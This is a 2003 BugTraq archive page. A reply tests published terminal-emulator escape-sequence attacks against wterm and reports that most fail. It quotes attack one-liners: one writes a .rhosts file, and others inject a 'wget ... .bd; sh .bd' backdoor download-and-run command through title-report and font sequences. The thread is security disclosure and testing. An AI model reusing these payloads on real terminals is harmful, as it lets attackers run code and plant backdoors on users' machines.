BugTraq
Terminal Emulator Security Issues Feb 24 2003 09:02PM
H D Moore (termulation digitaloffense net) (2 replies)
Re: Terminal Emulator Security Issues Feb 25 2003 02:09AM
Michael Jennings (mej eterm org) (1 replies)
Re: Terminal Emulator Security Issues Feb 25 2003 02:07PM
H D Moore (termulation digitaloffense net) (1 replies)
Re: Terminal Emulator Security Issues Feb 25 2003 05:28PM
Michael Jennings (mej eterm org) (1 replies)
Re: Terminal Emulator Security Issues Mar 02 2003 09:37PM
Michael Jennings (mej eterm org) (1 replies)
RE: Terminal Emulator Security Issues Mar 03 2003 05:43PM
Kenn Humborg (kenn bluetree ie) (1 replies)
Re: Terminal Emulator Security Issues Mar 03 2003 06:01PM
Michael Jennings (mej eterm org)
Re: Terminal Emulator Security Issues Feb 25 2003 12:23AM
Juraj Ziegler (e hq sk)
Wterm was not mentioned throughout the article, so I decided to test it
quickly.

On Mon, Feb 24, 2003 at 03:02:52PM -0600, H D Moore wrote:o
> $ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"

Does not work. Code 33 is not implemented, according to the
documentation, code 50 is used to change font [specifying movement in
the terminal's font list].

> $ echo -e "\e]2;This is the new window title\a"

Works.

> $ echo -e "\e[21t"

echo -e "\e]2;whoo\a"
echo -e "\e[21t"

Changes window title to 'whoo', but nothing is pasted -> does not work.

> $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"

It can be deduced that this does not work either, and a quick test
proved it.

> $ echo -e "\eP0;0|0A/17\x9c"

Safe from this harm, over here.

> $ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"

Besides of a weird output from echo itself [as no all characters where
handled by the terminal], nothing.

The output is: :]itd

As to wterm's origin, it seems to be based on rxvt
<quote site="http://largo.windowmaker.org/files.php#wterm">
wterm started as a beta test of some additions Alfredo hoped to get
contributed to the official rxvt source tree.
</quote>

Version tested: 6.2.9 - latest (even though released in 8/2001)

[e]

--
________________________________________________________________________
_______
>e (at) hq (dot) sk [email concealed]< /(bb|[^b]{2})/ >http://hq.sk/~euro<
"always know what you say, but do not always say what you know"

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus